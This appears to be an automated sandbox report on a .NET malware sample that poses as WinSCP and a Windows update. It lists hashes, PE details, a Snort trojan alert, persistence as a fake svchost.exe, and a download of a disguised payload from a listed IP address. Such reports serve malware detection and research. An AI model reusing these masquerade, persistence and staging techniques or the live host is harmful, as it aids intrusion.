.....(....o!...o"....s#......o$.....+...(%.........o&...o'.......((..
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\svchost.exe:Zone.Identifier
Process:C:\Users\user\Desktop\45I8GbQlUj.exe
File Type:ASCII text, with CRLF line terminators
Category:modified
Size (bytes):26
Entropy (8bit):3.95006375643621
Encrypted:false
SSDEEP:3:ggPYV:rPYV
MD5:187F488E27DB4AF347237FE461A079AD
SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:true
Reputation:high, very likely benign file
Preview: [ZoneTransfer]....ZoneId=0

Static File Info

General

File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):4.125149292696976
TrID:
  • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
  • Win32 Executable (generic) a (10002005/4) 49.78%
  • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
  • Generic Win/DOS Executable (2004/3) 0.01%
  • DOS Executable Generic (2002/1) 0.01%
File name:45I8GbQlUj.exe
File size:54272
MD5:1b1e4286625bb189a526e910f2031c7b
SHA1:650c0550f12c65d9841d10ab589ff39261018957
SHA256:c9d7cb68dec80469c3c03b0e90c7af1972462ca7779424db3bfd9d44aebaa624
SHA512:68f2366606b658fddb2b5e9bae2e6931fb455a230f8a4813eacb38a3d7853b9640f46fe9ee6ffd9862a509558b66c30a3494cb7231c3ef7cd784950771273155
SSDEEP:192:s7yxMfjf6NrLqKZ6mXS9LzL1pvULIRPqY2F3991ZuBhyY8PGCz9QwAOSZCGQyBbf:KyufjSLq86mXS9LzLdqY2LHZ4cZA
File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....vL..........."...0..............5... ...@....@.. ....................... ............@................................

File Icon

Icon Hash:00928e8e868eb000

Static PE Info

General

Entrypoint:0x403512
Entrypoint Section:.text
Digitally signed:false
Imagebase:0x400000
Subsystem:windows gui
Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Time Stamp:0x964C769C [Sat Nov 27 02:38:20 2049 UTC]
TLS Callbacks:
CLR (.Net) Version:v4.0.30319
OS Version Major:4
OS Version Minor:0
File Version Major:4
File Version Minor:0
Subsystem Version Major:4
Subsystem Version Minor:0
Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

NameVirtual AddressVirtual Size Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
IMAGE_DIRECTORY_ENTRY_IMPORT0x34c00x4f.text
IMAGE_DIRECTORY_ENTRY_RESOURCE0x40000xb95c.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
IMAGE_DIRECTORY_ENTRY_BASERELOC0x100000xc.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG0x34a40x1c.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
IMAGE_DIRECTORY_ENTRY_TLS0x00x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

Sections

NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
.text0x20000x15180x1600False0.545632102273data5.4073053016IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rsrc0x40000xb95c0xba00False0.0978032594086data3.78149617358IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc0x100000xc0x200False0.044921875data0.0815394123432IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

NameRVASizeTypeLanguageCountry
RT_ICON0x41e00x8dbPNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
RT_ICON0x4acc0x4228dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 4294967295, next used block 4294967295
RT_ICON0x8d040x25a8data
RT_ICON0xb2bc0x1a68data
RT_ICON0xcd340x10a8data
RT_ICON0xddec0x988data
RT_ICON0xe7840x6b8data
RT_ICON0xee4c0x468GLS_BINARY_LSB_FIRST
RT_GROUP_ICON0xf2c40x76data
RT_VERSION0xf34c0x40edata
RT_MANIFEST0xf76c0x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

Imports

DLLImport
mscoree.dll_CorExeMain

Version Infos

DescriptionData
Translation0x0000 0x04b0
LegalCopyright(c) 2000-2021 Martin Prikryl
Assembly Version5.19.2.11614
InternalNameKB5009812.exe
FileVersion5.19.2.11614
CompanyNameMartin Prikryl
LegalTrademarks
CommentsWinSCP: SFTP, FTP, WebDAV, S3 and SCP client
ProductNameWinSCP
ProductVersion5.19.2.11614
FileDescriptionWinSCP: SFTP, FTP, WebDAV, S3 and SCP client
OriginalFilenameKB5009812.exe

Network Behavior

Snort IDS Alerts

TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
01/15/22-01:14:06.276603TCP2034631ET TROJAN Maldoc Activity (set)4976080192.168.2.474.201.28.62

Network Port Distribution

TCP Packets

TimestampSource PortDest PortSource IPDest IP
Jan 15, 2022 01:14:06.172054052 CET4976080192.168.2.474.201.28.62
Jan 15, 2022 01:14:06.273446083 CET804976074.201.28.62192.168.2.4
Jan 15, 2022 01:14:06.273605108 CET4976080192.168.2.474.201.28.62
Jan 15, 2022 01:14:06.276602983 CET4976080192.168.2.474.201.28.62
Jan 15, 2022 01:14:06.379652977 CET804976074.201.28.62192.168.2.4
Jan 15, 2022 01:14:06.379785061 CET804976074.201.28.62192.168.2.4
Jan 15, 2022 01:14:06.379858017 CET804976074.201.28.62192.168.2.4
Jan 15, 2022 01:14:06.379894972 CET4976080192.168.2.474.201.28.62
Jan 15, 2022 01:14:06.379923105 CET804976074.201.28.62192.168.2.4
Jan 15, 2022 01:14:06.379991055 CET4976080192.168.2.474.201.28.62
Jan 15, 2022 01:14:06.379996061 CET804976074.201.28.62192.168.2.4
Jan 15, 2022 01:14:06.380064011 CET804976074.201.28.62192.168.2.4
Jan 15, 2022 01:14:06.380121946 CET4976080192.168.2.474.201.28.62
Jan 15, 2022 01:14:06.380125999 CET804976074.201.28.62192.168.2.4
Jan 15, 2022 01:14:06.380198956 CET804976074.201.28.62192.168.2.4
Jan 15, 2022 01:14:06.380254030 CET4976080192.168.2.474.201.28.62
Jan 15, 2022 01:14:06.380259037 CET804976074.201.28.62192.168.2.4
Jan 15, 2022 01:14:06.380323887 CET804976074.201.28.62192.168.2.4
Jan 15, 2022 01:14:06.380381107 CET4976080192.168.2.474.201.28.62
Jan 15, 2022 01:14:06.480017900 CET804976074.201.28.62192.168.2.4
Jan 15, 2022 01:14:06.480077982 CET804976074.201.28.62192.168.2.4
Jan 15, 2022 01:14:06.480098963 CET804976074.201.28.62192.168.2.4
Jan 15, 2022 01:14:06.480135918 CET804976074.201.28.62192.168.2.4
Jan 15, 2022 01:14:06.480155945 CET804976074.201.28.62192.168.2.4
Jan 15, 2022 01:14:06.480178118 CET804976074.201.28.62192.168.2.4
Jan 15, 2022 01:14:06.480199099 CET804976074.201.28.62192.168.2.4
Jan 15, 2022 01:14:06.480220079 CET804976074.201.28.62192.168.2.4
Jan 15, 2022 01:14:06.480238914 CET4976080192.168.2.474.201.28.62
Jan 15, 2022 01:14:06.480257988 CET804976074.201.28.62192.168.2.4
Jan 15, 2022 01:14:06.480278015 CET4976080192.168.2.474.201.28.62
Jan 15, 2022 01:14:06.480284929 CET804976074.201.28.62192.168.2.4
Jan 15, 2022 01:14:06.480284929 CET4976080192.168.2.474.201.28.62
Jan 15, 2022 01:14:06.480308056 CET804976074.201.28.62192.168.2.4
Jan 15, 2022 01:14:06.480331898 CET804976074.201.28.62192.168.2.4
Jan 15, 2022 01:14:06.480340958 CET4976080192.168.2.474.201.28.62
Jan 15, 2022 01:14:06.480357885 CET804976074.201.28.62192.168.2.4
Jan 15, 2022 01:14:06.480386019 CET4976080192.168.2.474.201.28.62
Jan 15, 2022 01:14:06.480389118 CET804976074.201.28.62192.168.2.4
Jan 15, 2022 01:14:06.480412960 CET804976074.201.28.62192.168.2.4
Jan 15, 2022 01:14:06.480436087 CET804976074.201.28.62192.168.2.4
Jan 15, 2022 01:14:06.480448961 CET4976080192.168.2.474.201.28.62
Jan 15, 2022 01:14:06.480458021 CET804976074.201.28.62192.168.2.4
Jan 15, 2022 01:14:06.480482101 CET804976074.201.28.62192.168.2.4
Jan 15, 2022 01:14:06.480494022 CET4976080192.168.2.474.201.28.62
Jan 15, 2022 01:14:06.480504990 CET804976074.201.28.62192.168.2.4
Jan 15, 2022 01:14:06.480528116 CET804976074.201.28.62192.168.2.4
Jan 15, 2022 01:14:06.480532885 CET4976080192.168.2.474.201.28.62
Jan 15, 2022 01:14:06.480575085 CET4976080192.168.2.474.201.28.62
Jan 15, 2022 01:14:06.578672886 CET804976074.201.28.62192.168.2.4
Jan 15, 2022 01:14:06.578723907 CET804976074.201.28.62192.168.2.4
Jan 15, 2022 01:14:06.578763008 CET804976074.201.28.62192.168.2.4
Jan 15, 2022 01:14:06.578788996 CET4976080192.168.2.474.201.28.62
Jan 15, 2022 01:14:06.578802109 CET804976074.201.28.62192.168.2.4
Jan 15, 2022 01:14:06.578844070 CET804976074.201.28.62192.168.2.4
Jan 15, 2022 01:14:06.578857899 CET4976080192.168.2.474.201.28.62
Jan 15, 2022 01:14:06.578883886 CET804976074.201.28.62192.168.2.4
Jan 15, 2022 01:14:06.578922033 CET804976074.201.28.62192.168.2.4
Jan 15, 2022 01:14:06.578928947 CET4976080192.168.2.474.201.28.62
Jan 15, 2022 01:14:06.578963041 CET804976074.201.28.62192.168.2.4
Jan 15, 2022 01:14:06.578999996 CET804976074.201.28.62192.168.2.4
Jan 15, 2022 01:14:06.579011917 CET4976080192.168.2.474.201.28.62
Jan 15, 2022 01:14:06.579039097 CET804976074.201.28.62192.168.2.4
Jan 15, 2022 01:14:06.579077005 CET804976074.201.28.62192.168.2.4
Jan 15, 2022 01:14:06.579091072 CET4976080192.168.2.474.201.28.62
Jan 15, 2022 01:14:06.579117060 CET804976074.201.28.62192.168.2.4
Jan 15, 2022 01:14:06.579155922 CET804976074.201.28.62192.168.2.4
Jan 15, 2022 01:14:06.579164982 CET4976080192.168.2.474.201.28.62
Jan 15, 2022 01:14:06.579194069 CET804976074.201.28.62192.168.2.4
Jan 15, 2022 01:14:06.579232931 CET804976074.201.28.62192.168.2.4
Jan 15, 2022 01:14:06.579241991 CET4976080192.168.2.474.201.28.62
Jan 15, 2022 01:14:06.579272032 CET804976074.201.28.62192.168.2.4
Jan 15, 2022 01:14:06.579308987 CET804976074.201.28.62192.168.2.4
Jan 15, 2022 01:14:06.579317093 CET4976080192.168.2.474.201.28.62
Jan 15, 2022 01:14:06.579348087 CET804976074.201.28.62192.168.2.4
Jan 15, 2022 01:14:06.579385996 CET804976074.201.28.62192.168.2.4
Jan 15, 2022 01:14:06.579394102 CET4976080192.168.2.474.201.28.62
Jan 15, 2022 01:14:06.579425097 CET804976074.201.28.62192.168.2.4
Jan 15, 2022 01:14:06.579464912 CET804976074.201.28.62192.168.2.4
Jan 15, 2022 01:14:06.579472065 CET4976080192.168.2.474.201.28.62
Jan 15, 2022 01:14:06.579502106 CET804976074.201.28.62192.168.2.4
Jan 15, 2022 01:14:06.579540968 CET804976074.201.28.62192.168.2.4
Jan 15, 2022 01:14:06.579546928 CET4976080192.168.2.474.201.28.62
Jan 15, 2022 01:14:06.579581022 CET804976074.201.28.62192.168.2.4
Jan 15, 2022 01:14:06.579619884 CET804976074.201.28.62192.168.2.4
Jan 15, 2022 01:14:06.579628944 CET4976080192.168.2.474.201.28.62
Jan 15, 2022 01:14:06.579658985 CET804976074.201.28.62192.168.2.4
Jan 15, 2022 01:14:06.579696894 CET804976074.201.28.62192.168.2.4
Jan 15, 2022 01:14:06.579709053 CET4976080192.168.2.474.201.28.62
Jan 15, 2022 01:14:06.579736948 CET804976074.201.28.62192.168.2.4
Jan 15, 2022 01:14:06.579777002 CET804976074.201.28.62192.168.2.4
Jan 15, 2022 01:14:06.579787970 CET4976080192.168.2.474.201.28.62
Jan 15, 2022 01:14:06.579814911 CET804976074.201.28.62192.168.2.4
Jan 15, 2022 01:14:06.579854012 CET804976074.201.28.62192.168.2.4
Jan 15, 2022 01:14:06.579866886 CET4976080192.168.2.474.201.28.62
Jan 15, 2022 01:14:06.579891920 CET804976074.201.28.62192.168.2.4
Jan 15, 2022 01:14:06.579929113 CET804976074.201.28.62192.168.2.4
Jan 15, 2022 01:14:06.579941988 CET4976080192.168.2.474.201.28.62
Jan 15, 2022 01:14:06.579967976 CET804976074.201.28.62192.168.2.4
Jan 15, 2022 01:14:06.580004930 CET804976074.201.28.62192.168.2.4
Jan 15, 2022 01:14:06.580018044 CET4976080192.168.2.474.201.28.62

DNS Answers

TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
Jan 15, 2022 01:14:23.194775105 CET8.8.8.8192.168.2.40x52b2No error (0)a-0019.a.dns.azurefd.neta-0019.standard.a-msedge.netCNAME (Canonical name)IN (0x0001)

HTTP Request Dependency Graph

  • 74.201.28.62

HTTP Packets

Session IDSource IPSource PortDestination IPDestination PortProcess
0192.168.2.44976074.201.28.6280C:\Users\user\Desktop\45I8GbQlUj.exe
TimestampkBytes transferredDirectionData
Jan 15, 2022 01:14:06.276602983 CET875OUTGET /book/KB5009812.png HTTP/1.1
Host: 74.201.28.62
Connection: Keep-Alive
Jan 15, 2022 01:14:06.379652977 CET1011INHTTP/1.1 200 OK
Content-Type: image/png
Last-Modified: Fri, 14 Jan 2022 18:56:38 GMT
Accept-Ranges: bytes
ETag: "951ab975789d81:0"
Server: Microsoft-IIS/10.0
X-Powered-By: ASP.NET
Date: Sat, 15 Jan 2022 00:14:06 GMT
Content-Length: 949760
Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 35 10 00 00 00 0c 00 0e 90 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 00 2e 00 30 00 2e 00 30 00 2e 00 31 00 00 00 6e 00 6f 00 69 00 73 00 72 00 65 00 56 00 20 00 79 00 6c 00 62 00 6d 00 65 00 73 00 73 00 41 00 01 00 08 00 38 00 00 00 30 00 2e 00 30 00 2e 00 30 00 2e 00 31 00 00 00 6e 00 6f 00 69 00 73 00 72 00 65 00 56 00 74 00 63 00 75 00 64 00 6f 00 72 00 50 00 01 00 08 00 34 00 00 00 00 00 00 00 00 00 65 00 6d 00 61 00 4e 00 74 00 63 00 75 00 64 00 6f 00 72 00 50 00 01 00 01 00 22 00 00 00 6c 00 6c 00 64 00 2e 00 6b 00 71 00 6a 00 6c 00 76 00 62 00 67 00 79 00 72 00 71 00 66 00 68 00 69 00 6a 00 51 00 00 00 65 00 6d 00 61 00 6e 00 65 00 6c 00 69 00 46 00 6c 00 61 00 6e 00 69 00 67 00 69 00 72 00 4f 00 01 00 14 00 50 00 00 00 00 00 00 00 00 00 73 00 6b 00 72 00 61 00 6d 00 65 00 64 00 61 00 72 00 54 00 6c 00 61 00 67 00 65 00 4c 00 01 00 01 00 2a 00 00 00 00 00 32 00 32 00 30 00 32 00 20 00 a9 00 20 00 74 00 68 00 67 00 69 00 72 00 79 00 70 00 6f 00 43 00 00 00 74 00 68 00 67 00 69 00 72 00 79 00 70 00 6f 00 43 00 6c 00 61 00 67 00 65 00 4c 00 01 00 11 00 46 00 00 00 6c 00 6c 00 64 00 2e 00 6b 00 71 00 6a 00 6c 00 76 00 62 00 67 00 79 00 72 00 71 00 66 00 68 00 69 00 6a 00 51 00 00 00 65 00 6d 00 61 00 4e 00 6c 00 61 00 6e 00 72 00 65 00 74 00 6e 00 49 00 01 00 14 00 48 00 00 00 30 00 2e 00 30 00 2e 00 30 00 2e 00 31
Data Ascii: 50.0.0.1noisreV ylbmessA80.0.0.1noisreVtcudorP4emaNtcudorP"lld.kqjlvbgyrqfhijQemaneliFlanigirOPskramedarTlageL*2202 thgirypoCthgirypoClageLFlld.kqjlvbgyrqfhijQemaNlanretnIH0.0.0.1


Code Manipulations

Statistics

System Behavior

General

Start time:01:14:04
Start date:15/01/2022
Path:C:\Users\user\Desktop\45I8GbQlUj.exe
Wow64 process (32bit):false
Commandline:"C:\Users\user\Desktop\45I8GbQlUj.exe"
Imagebase:0x450000
File size:54272 bytes
MD5 hash:1B1E4286625BB189A526E910F2031C7B
Has elevated privileges:true
Has administrator privileges:true
Programmed in:.Net C# or VB.NET
Reputation:low

Disassembly

Code Analysis

Reset < >